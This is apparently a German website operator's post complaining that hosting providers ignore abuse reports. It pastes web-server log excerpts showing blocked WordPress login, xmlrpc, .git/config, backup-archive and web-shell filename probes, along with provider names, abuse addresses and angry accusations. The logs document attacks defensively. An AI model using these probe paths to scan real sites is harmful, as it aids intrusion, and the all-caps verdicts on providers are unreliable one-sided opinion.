Bedauerlicherweise wird weiterhin nichts gegen die Sicherheitslücken in deren Netzwerke getan, die Hacking-Versuche gehen weiter!

OBWOHL DER PROVIDER DANN IN EINER EMAIL MITTEILTE, DAS PROBLEM SEI GELÖST, GEHE DIE HACKING-VERSUCHE WEITER!!!

91.224.92.99 website*x.com – – [22/Aug/2025:10:31:57 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
91.224.92.99 website*x.com – – [22/Aug/2025:10:31:57 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [22/Aug/2025:10:31:57 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [22/Aug/2025:10:31:57 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [22/Aug/2025:10:31:57 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [22/Aug/2025:10:31:57 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
+
91.224.92.127 www.website*x.de – – [22/Aug/2025:04:16:58 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
91.224.92.127 www.website*x.de – – [22/Aug/2025:04:16:58 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
+
141.98.11.10 www.website*x.de – – [22/Aug/2025:07:03:22 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0“
141.98.11.10 www.website*x.de – – [22/Aug/2025:07:03:33 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
141.98.11.10 www.website*x.de – – [22/Aug/2025:07:03:33 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0“

SO ETWAS IST EIN ABSOLUTE NOGO!

Hier ein paar Logfile-Auszüge vom letzten Wochenende:

AS209605 – UAB Host Baltic – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – IRRESPONSIBLE PROVIDER! ABUSE EMAILS ARE ONLY PROCESSED MANY DAYS LATER!!!
91.224.92.45 website*x.com – – [16/Aug/2025:03:47:29 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
91.224.92.45 website*x.com – – [16/Aug/2025:03:47:29 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [16/Aug/2025:03:47:29 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [16/Aug/2025:03:47:29 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“
91.224.92.45 website*x.com – – [16/Aug/2025:03:47:29 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15“
91.224.92.45 website*x.com – – [16/Aug/2025:03:47:29 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“
+
141.98.11.169 website*x.com – – [16/Aug/2025:07:23:58 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15“
141.98.11.169 website*x.com – – [16/Aug/2025:07:24:08 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
141.98.11.169 website*x.com – – [16/Aug/2025:07:24:08 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
+
141.98.11.10 www.website*x.de – – [16/Aug/2025:10:55:34 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
141.98.11.10 www.website*x.de – – [16/Aug/2025:10:55:34 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
141.98.11.10 www.website*x.de – – [16/Aug/2025:10:55:34 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
+
91.224.92.99 website*x.com – – [16/Aug/2025:14:13:58 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [16/Aug/2025:14:13:58 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [16/Aug/2025:14:13:58 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [16/Aug/2025:14:13:58 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [16/Aug/2025:14:13:59 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0“
91.224.92.99 website*x.com – – [16/Aug/2025:14:13:59 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
+
141.98.11.169 website*x.com – – [16/Aug/2025:22:58:27 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
141.98.11.169 website*x.com – – [16/Aug/2025:22:58:27 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:120.0) Gecko/20100101 Firefox/120.0“
+
91.224.92.45 website*x.com – – [17/Aug/2025:02:52:18 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [17/Aug/2025:02:52:18 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
91.224.92.45 website*x.com – – [17/Aug/2025:02:52:18 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
91.224.92.45 website*x.com – – [17/Aug/2025:02:52:18 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0“
91.224.92.45 website*x.com – – [17/Aug/2025:02:52:18 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [17/Aug/2025:02:52:18 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
+
91.224.92.99 website*x.com – – [17/Aug/2025:05:49:20 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
91.224.92.99 website*x.com – – [17/Aug/2025:05:49:20 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
91.224.92.99 website*x.com – – [17/Aug/2025:05:49:20 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
91.224.92.99 website*x.com – – [17/Aug/2025:05:49:20 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:121.0) Gecko/20100101 Firefox/121.0“
91.224.92.99 website*x.com – – [17/Aug/2025:05:49:20 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0“
91.224.92.99 website*x.com – – [17/Aug/2025:05:49:20 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
+
91.224.92.99 website*x.com – – [19/Aug/2025:06:29:44 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [19/Aug/2025:06:29:44 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [19/Aug/2025:06:29:44 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [19/Aug/2025:06:29:44 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
91.224.92.99 website*x.com – – [19/Aug/2025:06:29:44 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
91.224.92.99 website*x.com – – [19/Aug/2025:06:29:44 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0“

Solche Provider gehören sofort verboten, sofort gesperrt, so ein Verhalten ist absolut Verantwortungslos!!! Durch diese UNTÄTIGKEIT gefährdet man täglich UNZÄHLIGE FREMDE WEBSITES!

HIER NUN DIE HACKER-IDIOTEN VOM WOCHENENDE, LOGFILE-AUSZÜGE BEGINNEN AB FREITAG, 15.08.25 BIS SONNTAG, 17.08.25!

Sämtliche Abuse-Mails, die bei uns eh immer fix und fast automatisch per Script erstellt sind, gehen heute Morgen an die zuständigen und MIT VERANTWORTLICHEN PROVIDER!

MAIL NR. 1 TODAY – Hacking-attempts from weekend!

abuse@acad.bg,abuse-reports@cloudzy.com,abuse@magic.fr

AS6802 – Bulgarian Research and Education Network Association (BREN) – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@acad.bg – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.141.86.36 website*x.com – – [15/Aug/2025:17:00:42 +0200] „GET /wp-remote-api HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS14956 – RouterHosting LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-reports@cloudzy.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:40:48 +0200] „GET /wp-admin/network/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:41:07 +0200] „GET /wp-admin/js/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:41:31 +0200] „GET /wp-admin/images/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:42:14 +0200] „GET /wp-admin/css/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:42:23 +0200] „GET /wp-includes/SimplePie/Content/Type/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:42:43 +0200] „GET /wp-includes/Requests/Auth/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:43:15 +0200] „GET /wp-admin/css/colors/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:44:16 +0200] „GET /wp-content/languages/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:44:42 +0200] „GET /wp-content/upgrade/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:44:55 +0200] „GET /wp-content/IXR/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:45:10 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:45:13 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:45:13 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:45:15 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:45:17 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:372::1 website*x.com – – [15/Aug/2025:18:45:18 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS34177 – CELESTE SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@magic.fr
46.21.198.186 website*x.com – – [15/Aug/2025:20:55:58 +0200] „HEAD /new.zip HTTP/1.0“ 403 – „-“ „-“
46.21.198.186 website*x.com – – [15/Aug/2025:20:55:58 +0200] „HEAD /data.zip HTTP/1.0“ 403 – „-“ „-“
46.21.198.186 website*x.com – – [15/Aug/2025:20:55:58 +0200] „HEAD /temp.zip HTTP/1.0“ 403 – „-“ „-“
46.21.198.186 website*x.com – – [15/Aug/2025:20:55:58 +0200] „HEAD /old.zip HTTP/1.0“ 403 – „-“ „-“

MAIL NR. 2 TODAY – Hacking-attempts from weekend!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@jink.host, abuse@pfcloud.io,kontakt@pfcloud.io

AS49581 – Ferdinand Zink trading as Tube-Hosting – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@jink.host, abuse@pfcloud.io – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
195.182.25.114 website*x.com – – [15/Aug/2025:23:46:07 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0“
195.182.25.114 website*x.com – – [16/Aug/2025:00:13:10 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/620.30 (KHTML, like Gecko) Version/17.0 Safari/620.30“

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:47 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:47 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:47 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:48 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:48 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:48 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:48 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:48 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:48 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.55.230.193 website*x.com – – [16/Aug/2025:01:04:48 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

MAIL NR. 3 TODAY – Hacking-attempts from weekend!

abuse@ovh.ca,abuse@ovh.net, abuse@ovh.us,admin@serveroffer.lt,info@smartlink-isp.com

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.ca – ABUSE PER EMAIL IS STANDARD!!!
158.69.23.79 website*x.com – – [16/Aug/2025:03:15:46 +0200] „GET /wp-remote-api HTTP/1.0“ 403 – „-“ „Linux Mozilla“
158.69.23.79 website*x.com – – [16/Aug/2025:03:15:47 +0200] „GET /api/wp-remote-api HTTP/1.0“ 403 – „-“ „Linux Mozilla“

AS210413 – Smart Link Company for Internet Service – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@smartlink-isp.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
45.157.54.22 website*x.com – – [16/Aug/2025:04:28:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.22 website*x.com – – [16/Aug/2025:04:28:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

MAIL NR. 4 TODAY – Hacking-attempts from weekend!

abuse@ionos.com,report@abuseradar.com,admin@serveroffer.lt,abuse@datacamp.co.uk

AS8560 – IONOS SE – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ionos.com – EVERY DAY SEARCH FOR UNSECURE *:PHP-FILE AND IONOS DOES NOTHING!!! THIS IS IGNORANT!
212.132.98.244 website*x.com – – [16/Aug/2025:05:41:27 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
212.132.98.244 website*x.com – – [16/Aug/2025:05:41:47 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS212238 – Datacamp Limited – AGAIN AND AGAIN EVERY DAY!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@datacamp.co.uk
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:30 +0200] „GET /wp-includes/customize/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
149.88.106.173 website*x.com – – [16/Aug/2025:10:29:30 +0200] „GET /wp-includes/blocks/shortcode/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
